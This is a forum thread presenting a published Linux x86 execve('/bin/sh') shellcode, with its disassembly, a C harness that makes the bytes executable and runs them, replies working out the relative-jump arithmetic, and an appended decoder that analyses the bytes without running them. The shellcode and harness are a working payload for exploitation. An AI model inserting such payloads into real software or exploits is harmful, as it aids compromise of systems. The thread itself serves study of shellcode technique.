Aerosol Posted May 4, 2015

/*
; Title: Linux/x86 execve "/bin/sh" - shellcode 35 bytes
; Platform: linux/x86_64
; Date: 2014-06-26
; Author: Mohammad Reza Espargham
; Simple ShellCode

section .text:
08048060 <_start>:
 8048060:  eb 17                 jmp    8048079
08048062:
 8048062:  5e                    pop    %esi
 8048063:  31 d2                 xor    %edx,%edx
 8048065:  52                    push   %edx
 8048066:  56                    push   %esi
 8048067:  89 e1                 mov    %esp,%ecx
 8048069:  89 f3                 mov    %esi,%ebx
 804806b:  31 c0                 xor    %eax,%eax
 804806d:  b0 0b                 mov    $0xb,%al
 804806f:  cd 80                 int    $0x80
 8048071:  31 db                 xor    %ebx,%ebx
 8048073:  31 c0                 xor    %eax,%eax
 8048075:  40                    inc    %eax
 8048076:  cd 80                 int    $0x80
08048078:
 8048078:  e8 e5 ff ff ff        call   8048062
 804807d:  2f                    das
 804807e:  62 69 6e              bound  %ebp,0x6e(%ecx)
 8048081:  2f                    das
 8048082:  73 68                 jae    80480ec
*/

/* Build as 32-bit code (int $0x80, 32-bit registers): gcc -m32 shellcode.c -o shellcode */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

#define PAGE_SIZE 4096

/* 36 bytes; the string literal's trailing NUL is what terminates "/bin/sh" for execve */
unsigned char code[] = {
    "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd"
    "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68"
};

int main(void)
{
    /* .data is not executable on a modern kernel, so make the page(s) holding
     * code[] RWX before jumping into them; this is what <sys/mman.h> and
     * PAGE_SIZE are here for. */
    uintptr_t start = (uintptr_t)code & ~(uintptr_t)(PAGE_SIZE - 1);
    uintptr_t end = ((uintptr_t)code + sizeof(code) + PAGE_SIZE - 1) & ~(uintptr_t)(PAGE_SIZE - 1);
    if (mprotect((void *)start, end - start, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        perror("mprotect");
        return 1;
    }

    printf("Shellcode Length: %d\n", (int)strlen((const char *)code));
    int (*ret)(void) = (int (*)(void))code;
    ret();   /* execve("/bin/sh", ...): does not return on success */
    return 0;
}
Gushterul Posted May 4, 2015
(not that anyone would be smart enough to actually use them...)
jmp 8048079 ?
Nytro Posted May 4, 2015
It's relative.
The opcode "eb 17" == "jump 0x17 bytes"
8048062 (the next address) + 0x17 == 8048079
It's odd that it's "jmp 8048079" and not "jmp 08048078", because at "08048078" is the call that pushes "/bin/sh" onto the stack.
Ah, damn. If you look at the shellcode in the C program: \xeb\x16\x5e\x31
It's "eb 16", i.e. "jmp 08048078".
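The relative-jump arithmetic Nytro walks through above, as an added example that is not part of the original post or of Espargham's shellcode: a small C program that decodes the EB rel8 jump and the E8 rel32 call from the byte array in the first post, follows the jmp/call/pop trick to find what `pop %esi` ends up holding, and shows why the listing's `eb 17` would not work. The base address 0x08048060 is the one the listing gives `_start`; the function names and the `LISTING_BASE` constant are my own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 36 bytes of the C harness in the first post, unchanged. */
static const unsigned char shellcode[] =
    "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd"
    "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* Address the listing gives _start; only used so the output matches the
 * listing's numbers, since every displacement below is relative (assumption). */
#define LISTING_BASE 0x08048060u

/* EB rel8: target = address of the next instruction (off + 2) + signed byte. */
uint32_t jmp_rel8_target(const unsigned char *code, size_t off, uint32_t base)
{
    int8_t rel = (int8_t)code[off + 1];
    return base + (uint32_t)off + 2 + (uint32_t)(int32_t)rel;
}

/* E8 rel32: target = address of the next instruction (off + 5) + signed
 * little-endian dword; unsigned wrap-around gives the same result as a signed add. */
uint32_t call_rel32_target(const unsigned char *code, size_t off, uint32_t base)
{
    uint32_t rel = (uint32_t)code[off + 1] | ((uint32_t)code[off + 2] << 8) |
                   ((uint32_t)code[off + 3] << 16) | ((uint32_t)code[off + 4] << 24);
    return base + (uint32_t)off + 5 + rel;
}

/* Follow the jmp/call/pop trick statically: the jmp at offset 0 must land on
 * an E8 call, and that call pushes the address of the byte right after it,
 * which is what `pop %esi` receives. Returns that address and copies the bytes
 * found there (the "/bin/sh" string) into out; returns 0 if the jump does not
 * land exactly on a call opcode. */
uint32_t resolve_jmp_call_pop(const unsigned char *code, size_t len, uint32_t base,
                              char *out, size_t outlen)
{
    if (len < 2 || code[0] != 0xEB)
        return 0;
    uint32_t call_addr = jmp_rel8_target(code, 0, base);
    if (call_addr < base || call_addr - base + 5 > len)
        return 0;
    size_t call_off = call_addr - base;
    if (code[call_off] != 0xE8)
        return 0;                           /* landed inside some other instruction */
    uint32_t str_addr = call_addr + 5;      /* the return address the call pushes */
    size_t str_off = call_off + 5;
    size_t n = len - str_off;
    if (n >= outlen)
        n = outlen - 1;
    memcpy(out, code + str_off, n);
    out[n] = '\0';
    return str_addr;
}

int main(void)
{
    char s[16];
    uint32_t esi = resolve_jmp_call_pop(shellcode, SHELLCODE_LEN, LISTING_BASE, s, sizeof s);
    printf("eb 16 at %08x -> jmp %08x\n", LISTING_BASE,
           jmp_rel8_target(shellcode, 0, LISTING_BASE));
    printf("e8 e5 ff ff ff at %08x -> call %08x\n", LISTING_BASE + 0x18,
           call_rel32_target(shellcode, 0x18, LISTING_BASE));
    printf("pop %%esi = %08x, bytes there: \"%s\"\n", esi, s);

    /* Same bytes with the displacement the listing shows (eb 17): the jump
     * lands one byte into the call, on its 0xe5 operand, so the trick breaks. */
    unsigned char listing[SHELLCODE_LEN];
    memcpy(listing, shellcode, SHELLCODE_LEN);
    listing[1] = 0x17;
    printf("eb 17 -> jmp %08x, resolves: %s\n",
           jmp_rel8_target(listing, 0, LISTING_BASE),
           resolve_jmp_call_pop(listing, SHELLCODE_LEN, LISTING_BASE, s, sizeof s) ? "yes" : "no");
    return 0;
}
```

This only decodes bytes, so it builds and runs on any host with `gcc -Wall jcp.c -o jcp`; no `-m32` or executable page is needed, and nothing is executed.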